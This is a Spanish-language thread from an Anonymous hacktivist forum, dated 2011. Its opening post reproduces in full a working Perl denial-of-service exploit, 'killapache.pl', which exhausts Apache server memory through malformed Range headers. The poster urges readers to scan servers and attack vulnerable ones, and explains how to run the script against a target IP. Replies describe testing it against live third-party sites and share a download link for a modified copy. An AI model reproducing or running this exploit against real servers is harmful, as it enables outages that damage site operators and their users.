Foro Anonymous Iberoamerica | BLOG: http://www.anonibero.tk | TWITTER: @anonopshispano @iberoanon @Anonymous_Co @AnonymousPeru | WE ARE LEGION! | irc.anonops.pro 6667 #iberoamerica |
 
ÍndiceÍndice  CalendarioCalendario  GaleríaGalería  FAQFAQ  BuscarBuscar  RegistrarseRegistrarse  ConectarseConectarse  WebchatWebchat  
Siguenos
Tambien en:


Temas más activos
Bienvenida
OpFacebook
#OpIndependencia
Manual Super Secreto de Anonymous
Reclutas Mexicanos
1 de Septiembre dia de la Operacion
Guia para reclutas
¿Quienes participaran de la OpFacebook?
Nuevos Videos #OP Maleducados HN despues de la Advertencia
Moderadores
Conectarse
Nombre de Usuario:
Contraseña:
Entrar automáticamente en cada visita: 
:: Recuperar mi contraseña
Mejores posteadores
Jisoo
 
Vanon Dax
 
ANONYMOUS L
 
SaGaRaS
 
Greek
 
independencia_mexico
 
Opshn
 
MasterDecoy LOL
 
Pluru
 
AnonPer
 
Últimos temas
» Nueva cuenta de Twitter ACTIVA
Lun Oct 10, 2016 11:29 pm por Jisoo

» Seguimos Vigilando
Lun Oct 10, 2016 11:19 pm por Jisoo

» Curso cracking desde cero
Jue Ago 06, 2015 5:49 pm por Cartoon

» hola deseo aprender
Miér Jul 29, 2015 4:54 pm por c#

» Hola anonymous.
Miér Jul 08, 2015 8:59 am por anonymous_66

» Hola me presento.
Miér Jul 08, 2015 8:49 am por anonymous_66

» Ayuda!!! :D
Mar Jun 30, 2015 12:25 pm por keniki2001@Outlook.com

» Me presento
Mar Jun 30, 2015 12:21 pm por keniki2001@Outlook.com

» [AYUDA] Malware Facebook
Lun Jun 29, 2015 1:00 pm por keniki2001@Outlook.com

Buscar
 
 

Resultados por:
 
Rechercher Búsqueda avanzada
¿Quién está en línea?
En total hay 1 usuario en línea: 0 Registrados, 0 Ocultos y 1 Invitado

Ninguno

La mayor cantidad de usuarios en línea fue 309 el Vie Ene 20, 2012 11:34 pm.
Bookmarking social
Bookmarking social digg  Bookmarking social delicious  Bookmarking social reddit  Bookmarking social stumbleupon  Bookmarking social slashdot  Bookmarking social yahoo  Bookmarking social google  Bookmarking social blogmarks  Bookmarking social live      

Conserva y comparte la dirección de Anonymous Latino en tu sitio de bookmarking social

Conserva y comparte la dirección de Anonymous Hispano en tu sitio de bookmarking social
Foro

Comparte | 
 

 exploit DDOS en toda la version de apache...

Ir abajo 
AutorMensaje
quisqueyano
Great Anon
Great Anon
avatar

Mensajes : 146
Experiencia : 199
Reputación : 4

MensajeTema: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 4:24 pm

Saludos Hermanos

Se ha publicado un el día 19 de agosto que causa una denegacion de servisio en todas las versiones de apache este es el codigo:

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl <host> [numforks]\n";
print "example: perl killapache.pl wwwexamplecom 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) {
usage;
exit;
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}

Personalmente no lo e probado pero de que funciona si funciona como es tan nuevo este exploit deben aver muchos server vulnerable.

a los server a atacar con este exploit basta con un escaneo y ver que servicios y verciones corre si notan que es apachue pues bueno ya saben que hacer con el exploit (6)

Nota: para ejecutarlo solo basta con guardar este codigo en un .txt ej. miexplit.pl ya que esta echo en perl y luego perl miexploit.pl IP que vamos a atacar Smile

un saludos anonymous
Volver arriba Ir abajo
Eyeless
Anon
Anon
avatar

Mensajes : 53
Experiencia : 69
Reputación : 10
Localización : Argentina

MensajeTema: Re: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 4:36 pm

Ahora en unos minutos voy a probarlos y les doy mi comentarios en base a esta herramienta.

Buen aporte desde ya.
Hay que prestar todas las herramientas posibles que esten a nuestro alcance.
Volver arriba Ir abajo
quisqueyano
Great Anon
Great Anon
avatar

Mensajes : 146
Experiencia : 199
Reputación : 4

MensajeTema: Re: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 4:47 pm

sip Eyeless estare al tanto de su comentario yo tambien lo probare e montado un server apache para ver que tal va este exploit.

esperare su comentario con ansias Very Happy
Volver arriba Ir abajo
Eyeless
Anon
Anon
avatar

Mensajes : 53
Experiencia : 69
Reputación : 10
Localización : Argentina

MensajeTema: Re: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 5:23 pm

Bueno, dado que me estoy por ir, le pude hacer unas pocas pruebas al Soft.

^^^^^^^^^ Herramienta Inicio ^^^^^^^^^

Con respecto al Posteado por Quisqueyano, hay un Error en la Linea nº57.
Recomiendo bajar este:
4shared.com/file/kBnrAmL7/killapache_pl.html

Es para version Windows. En Linux lo unico que tienen que hacer es "Renombrarlo", sacandole la extencion .bat y cambiandola a .pl

En el caso de que no tengan el Error de la Linea 57, hagan de cuenta que no puse ese Link, yo lo paso porque tube ese problema.

^^^^^^^^^ Herramienta Efecto ^^^^^^^^^

Con respespecto al Efecto de la Herramienta, dado que tube poco tiempo para probarla, no pude conseguir "tirar" (Denegar el Servicio) de ninguna pagina; las 4 veces que probe con 4 paginas distintas, me decia que dicha pagina no era Vulnerable; y eran paginas que corren en Apache.

Bueno esa es mi Opinion.
Cuando vuelva la estare testeando nuevamente y vere si consigo que funcione en algun sitio.
Volver arriba Ir abajo
Eyeless
Anon
Anon
avatar

Mensajes : 53
Experiencia : 69
Reputación : 10
Localización : Argentina

MensajeTema: Re: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 5:56 pm

Que tal Nuevamente.
Mil Disculpas por el Doble Post.

Vengo a avisar que hice otro Testeo.

^^^^^^^^^ Herramienta Configuracion ^^^^^^^^^

Bueno en cuanto a la configuracion, esta en parte mal hecha.
Te pide el Numero de Forks que quieras utilizar al costado del Sitio al que se quiere atacar, pero este no lo respeta, es decir que suponiendo que pones 150 Forks, por mal configuracion del Codigo no cumple, sino que utiliza los que tiene por defecto; es decir que en el caso que estos se quieran cambiar, tendria que hacerse desde el Codigo en si.


^^^^^^^^^ Herramienta Exitos ^^^^^^^^^

Cuando me refiero a Exitos, me estoy refiriendo a cuando pude concretar un ataque o no por medio de esta herramienta.

Lamentablemente no pude concretar ningun.
Cada vez que le dije que atacase a un sitio, que corre apache ya previamente analisado, me dijo que este no era Vulnerable; probe con 8 Sitios, entre los cuales 1 era mio.

El unico sitio que pude atacar fue el de "Apache", pero en medio del ataque se colgaba y me tiraba un error en una linea y volvia a retomar.

Dado que el ataque a "Apache" comenzo, se puede decir que no tube un error de sintaxis al momento de ingresar otros sitios, ya que use la misma metodologia.


Bueno esa es mi opinion y conclusiones sacadas de esta Herramienta.

Claro esta que yo me puedo equivocar, ya sea en el inicio del Codigo, como en su configuracion misma, por ende recomiendo tambien que hagan sus propias "pruebas"/"tests"

Espero que sirva.
Volver arriba Ir abajo
quisqueyano
Great Anon
Great Anon
avatar

Mensajes : 146
Experiencia : 199
Reputación : 4

MensajeTema: Re: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 6:47 pm

Saludos Eyeless

muy buen analisis yo la probare aver que tal me va y luego posteo.

gracias por los analisis Very Happy
Volver arriba Ir abajo
Jisoo
Administrador
Administrador
avatar

Mensajes : 1136
Experiencia : 1469
Reputación : 36
Localización : Monterrey

MensajeTema: Re: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 6:48 pm

GRACIAS POR LA INFO !!
SALUDOS!

______________________________________________________________
Volver arriba Ir abajo
http://anonymouslink.es.tl/Home.htm
Opshn
Moderador
Moderador
avatar

Mensajes : 425
Experiencia : 483
Reputación : 13
Localización : HONDURAS

MensajeTema: Re: exploit DDOS en toda la version de apache...   Lun Ago 29, 2011 7:50 pm

oye una explicacion como probarlo en localhost con campp porque no se como lol

______________________________________________________________
Es necesaria una revolucion etica, un cambio de rumbo.
Este sistema trata a los seres humanos como numeros
y no como personas


Apoyando OP Maleducados hn Fase II (by anonfibo)


Volver arriba Ir abajo
independencia_mexico
Web Master
Web Master
avatar

Mensajes : 438
Experiencia : 577
Reputación : 3
Localización : Mexico

MensajeTema: Re: exploit DDOS en toda la version de apache...   Mar Oct 11, 2011 10:51 pm

Buena info...
Volver arriba Ir abajo
http://independenciamexico.nixiweb.com/
henryxd
Great Anon
Great Anon


Mensajes : 77
Experiencia : 87
Reputación : 7

MensajeTema: Re: exploit DDOS en toda la version de apache...   Miér Oct 12, 2011 2:01 pm

:O.. eso casualidades de destino estaba buscando eso xD... gracias
Volver arriba Ir abajo
AyllonDark
Moderador
Moderador
avatar

Mensajes : 168
Experiencia : 196
Reputación : 13

MensajeTema: Re: exploit DDOS en toda la version de apache...   Jue Nov 03, 2011 12:25 am

Opshn, puedes probarlo con Xamp, o si deseas te recomiendo Wamp en localhost, el entorno es mas facil.

Apenas me de un tiempo tambien lo probare y comentare que tal me fue, y Eyeless, pues en que version de Apache l corriste, pues talves estas utilizando la ultima version, seria bueno probarla una antes, y pues ahi puede encontrar vulnerabilidades.

o hacer una web local lo mas vulnerable posible y ver si el codigo afecta el site.





Volver arriba Ir abajo
Contenido patrocinado




MensajeTema: Re: exploit DDOS en toda la version de apache...   

Volver arriba Ir abajo
 
exploit DDOS en toda la version de apache...
Volver arriba 
Página 1 de 1.

Permisos de este foro:No puedes responder a temas en este foro.
Anonymous Hispano :: Todo menos Anonymous :: Warez-
Cambiar a: